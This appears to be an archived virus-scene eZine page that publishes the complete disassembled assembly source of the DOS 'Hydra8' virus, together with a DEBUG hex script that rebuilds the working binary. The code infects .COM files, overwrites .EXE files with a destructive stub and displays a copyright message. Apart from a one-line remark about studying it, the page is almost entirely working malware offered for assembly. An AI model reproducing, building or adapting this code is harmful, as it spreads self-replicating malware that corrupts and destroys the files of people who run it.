Copy Link
Add to Bookmark
Report

SOURCE00.004 - The Hydra8 Virus [Source/Debug Script]

eZine's profile picture
Published in 
Source
 · 2 years ago

Well, another Source Code/Debug Script pair. The Hydra8 Virus isn't a very exciting virus. It merely changes the video mode, and then displays the message 'Copyright (c) 1991 C.A.V.E.', and then infects some files.

Oh yeah! So exciting, but at least it can be interesting to study.

[--- Cut Here -----------------------------------------------------------------] 


;€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€
;€€ €€
;€€ HYDRA8 €€
;€€ €€
;€€ Disassembly by: -=>Wasp<=- aka >>Night Crawler<< €€
;€€ €€
;€€ Reassemble with TASM 2.0 €€
;€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€

DATA_1E EQU 80H
DATA_16E EQU 1EFH
DATA_17E EQU 1F2H
DATA_18E EQU 9D9AH

SEG_A SEGMENT BYTE PUBLIC
ASSUME CS:SEG_A, DS:SEG_A


ORG 100h

HYDRA8 PROC FAR

START:
JMP LOC_2 ; (01E2)
DB 59H, 44H, 00H, 00H
DATA_4 DB 'HyDra-8 Beta - Not For Release'
DB '. *.CO?'
DB 0
DATA_7 DW 0, 84FCH
DATA_9 DW 0
DATA_10 DB 0
DB 29 DUP (0)
DATA_11 DB 0
DB 0, 0, 0, 0, 0, 0
DATA_12 DB 0
DB 0, 0, 0, 0, 0, 0
COPYRIGHT DB 'Copyright (c)'
DB ' 1991 by C.A.V.E. '
DATA_13 DB 2AH
DB 2EH, 45H, 58H, 45H, 00H
DATA_14 DB 33H
DB 0C9H, 1EH, 52H,0E8H, 06H, 00H
DB 0E8H, 13H, 00H,0EBH, 36H, 90H
DB 0BEH, 48H, 01H,0BFH, 5AH, 01H
DB 0B9H, 12H, 00H

LOCLOOP_1:
XOR BYTE PTR [SI],0F5H
MOVSB ; Mov [si] to es:[di]
LOOP LOCLOOP_1 ; Loop if cx > 0

RETN
MOV AX,0F00H
INT 10H ; Video display ah=functn 0Fh
; get state, al=mode, bh=page
MOV AH,0
INT 10H ; Video display ah=functn 00h
; set display mode in al
MOV AX,200H
MOV DH,0CH
MOV DL,1FH
INT 10H ; Video display ah=functn 02h
; set cursor location in dx
XOR DX,DX ; Zero register
MOV DX,OFFSET DATA_12
MOV AH,9
INT 21H ; DOS Services ah=function 09h
; display char string at ds:dx
MOV AX,200H
MOV DH,18H
MOV DL,0
INT 10H ; Video display ah=functn 02h
; set cursor location in dx
RETN
MOV AX,4C00H
INT 21H ; DOS Services ah=function 4Ch
; terminate with al=return code
ADD [BP+SI-6563H],AH
CMC ; Complement carry
PUSHF ; Push flags
XCHG DH,CH
MOV DI,DATA_18E
DB 9BH,0F5H,0B2H, 94H, 99H, 81H
DB 0CAH,0D1H
LOC_2:
PUSH AX
MOV AX,CS
ADD AX,1000H
XOR DI,DI ; Zero register
MOV CX,1EFH
MOV SI,OFFSET DS:[100H]
MOV ES,AX
REP MOVSB ; Rep when cx >0 Mov [si] to es:[di]
MOV AH,1AH
MOV DX,OFFSET DATA_10
INT 21H ; DOS Services ah=function 1Ah
; set DTA to ds:dx
MOV AH,4EH ; 'N'
MOV DX,OFFSET DATA_4+22H
INT 21H ; DOS Services ah=function 4Eh
; find 1st filenam match @ds:dx
JC LOC_6 ; Jump if carry Set
LOC_3:
MOV AH,3DH ; '='
MOV AL,2
MOV DX,OFFSET DATA_11
INT 21H ; DOS Services ah=function 3Dh
; open file, al=mode,name@ds:dx
MOV BX,AX
PUSH ES
POP DS
MOV AX,3F00H
MOV CX,0FFFFH
MOV DX,DATA_16E
INT 21H ; DOS Services ah=function 3Fh
; read file, cx=bytes, to ds:dx
ADD AX,1EFH
MOV CS:DATA_9,AX
CMP WORD PTR DS:DATA_17E,4459H
JNE LOC_4 ; Jump if not equal
MOV AH,3EH ; '>'
INT 21H ; DOS Services ah=function 3Eh
; close file, bx=file handle
PUSH CS
POP DS
MOV AH,4FH ; 'O'
INT 21H ; DOS Services ah=function 4Fh
; find next filename match
JC LOC_7 ; Jump if carry Set
JMP SHORT LOC_3 ; (0204)
LOC_4:
XOR CX,CX ; Zero register
MOV DX,CX
MOV AX,4200H
INT 21H ; DOS Services ah=function 42h
; move file ptr, cx,dx=offset
JC LOC_5 ; Jump if carry Set
MOV AH,40H ; '@'
XOR DX,DX ; Zero register
MOV CX,CS:DATA_9
INT 21H ; DOS Services ah=function 40h
; write file cx=bytes, to ds:dx
LOC_5:
MOV AH,3EH ; '>'
INT 21H ; DOS Services ah=function 3Eh
; close file, bx=file handle
PUSH CS
POP DS
LOC_6:
MOV AH,1AH
MOV DX,DATA_1E
INT 21H ; DOS Services ah=function 1Ah
; set DTA to ds:dx
JMP SHORT LOC_10 ; (02B0)
DB 90H
LOC_7:
CLC ; Clear carry flag
XOR CX,CX ; Zero register
PUSH DS
PUSH DX
MOV AH,1AH
MOV DX,OFFSET DATA_10
INT 21H ; DOS Services ah=function 1Ah
; set DTA to ds:dx
MOV DX,OFFSET DATA_13
MOV AH,4EH ; 'N'
XOR CX,CX ; Zero register
INT 21H ; DOS Services ah=function 4Eh
; find 1st filenam match @ds:dx
JC LOC_6 ; Jump if carry Set
LOC_8:
MOV AH,3CH ; '<'
XOR CX,CX ; Zero register
MOV DX,OFFSET DATA_11
INT 21H ; DOS Services ah=function 3Ch
; create/truncate file @ ds:dx
MOV BX,AX
JC LOC_6 ; Jump if carry Set
MOV AX,3D02H
MOV DX,OFFSET DATA_11
INT 21H ; DOS Services ah=function 3Dh
; open file, al=mode,name@ds:dx
MOV BX,AX
CLC ; Clear carry flag
XOR DX,DX ; Zero register
MOV AH,40H ; '@'
MOV DX,OFFSET DATA_14
MOV CX,5AH
INT 21H ; DOS Services ah=function 40h
; write file cx=bytes, to ds:dx
CMP AX,5AH
JB LOC_9 ; Jump if below
MOV AH,3EH ; '>'
INT 21H ; DOS Services ah=function 3Eh
; close file, bx=file handle
JC LOC_9 ; Jump if carry Set
MOV AH,4FH ; 'O'
INT 21H ; DOS Services ah=function 4Fh
; find next filename match
JNC LOC_8 ; Jump if carry=0
LOC_9:
MOV AX,4C00H
INT 21H ; DOS Services ah=function 4Ch
; terminate with al=return code
LOC_10:
XOR DI,DI ; Zero register
MOV SI,OFFSET DATA_15
MOV CX,22H
REP MOVSB ; Rep when cx >0 Mov [si] to es:[di]
POP BX
MOV CS:DATA_7,0
MOV WORD PTR CS:DATA_7+2,ES
POP BX
JMP DWORD PTR CS:DATA_7
DATA_15 DB 1EH
DB 07H,0B9H,0FFH,0FFH,0BEH,0EFH
DB 02H,0BFH, 00H, 01H, 2BH,0CEH
DB 0F3H,0A4H, 2EH,0C7H, 06H, 00H
DB 01H, 00H, 01H, 2EH, 8CH, 1EH
DB 02H, 01H, 8BH,0C3H, 2EH,0FFH
DB 2EH, 00H, 01H,0CDH
DB 20H

HYDRA8 ENDP

SEG_A ENDS
END START

[--- Cut Here -----------------------------------------------------------------]

n hydra8.coo
e 0100 E9 DF 00 59 44 00 00 48 79 44 72 61 2D 38 20 20
e 0110 20 42 65 74 61 20 2D 20 4E 6F 74 20 46 6F 72 20
e 0120 52 65 6C 65 61 73 65 2E 20 2A 2E 43 4F 3F 00 00
e 0130 00 FC 84 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0140 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0150 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0160 00 43 6F 70 79 72 69 67 68 74 20 28 63 29 20 20
e 0170 31 39 39 31 20 62 79 20 43 2E 41 2E 56 2E 45 2E
e 0180 20 20 2A 2E 45 58 45 00 33 C9 1E 52 E8 06 00 E8
e 0190 13 00 EB 36 90 BE 48 01 BF 5A 01 B9 12 00 80 34
e 01A0 F5 A4 E2 FA C3 B8 00 0F CD 10 B4 00 CD 10 B8 00
e 01B0 02 B6 0C B2 1F CD 10 33 D2 BA 5A 01 B4 09 CD 21
e 01C0 B8 00 02 B6 18 B2 00 CD 10 C3 B8 00 4C CD 21 00
e 01D0 A2 9D 9A F5 9C 86 F5 BF 9A 9D 9B F5 B2 94 99 81
e 01E0 CA D1 50 8C C8 05 00 10 33 FF B9 EF 01 BE 00 01
e 01F0 8E C0 F3 A4 B4 1A BA 35 01 CD 21 B4 4E BA 29 01
e 0200 CD 21 72 51 B4 3D B0 02 BA 53 01 CD 21 8B D8 06
e 0210 1F B8 00 3F B9 FF FF BA EF 01 CD 21 05 EF 01 2E
e 0220 A3 33 01 81 3E F2 01 59 44 75 0E B4 3E CD 21 0E
e 0230 1F B4 4F CD 21 72 28 EB CB 33 C9 8B D1 B8 00 42
e 0240 CD 21 72 0B B4 40 33 D2 2E 8B 0E 33 01 CD 21 B4
e 0250 3E CD 21 0E 1F B4 1A BA 80 00 CD 21 EB 52 90 F8
e 0260 33 C9 1E 52 B4 1A BA 35 01 CD 21 BA 82 01 B4 4E
e 0270 33 C9 CD 21 72 DF B4 3C 33 C9 BA 53 01 CD 21 8B
e 0280 D8 72 D2 B8 02 3D BA 53 01 CD 21 8B D8 F8 33 D2
e 0290 B4 40 BA 88 01 B9 5A 00 CD 21 3D 5A 00 72 0C B4
e 02A0 3E CD 21 72 06 B4 4F CD 21 73 CB B8 00 4C CD 21
e 02B0 33 FF BE CD 02 B9 22 00 F3 A4 5B 2E C7 06 2F 01
e 02C0 00 00 2E 8C 06 31 01 5B 2E FF 2E 2F 01 1E 07 B9
e 02D0 FF FF BE EF 02 BF 00 01 2B CE F3 A4 2E C7 06 00
e 02E0 01 00 01 2E 8C 1E 02 01 8B C3 2E FF 2E 00 01 CD
e 02F0 20
rcx
1F1
w
q

[--- Cut Here -----------------------------------------------------------------]


- Havoc

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT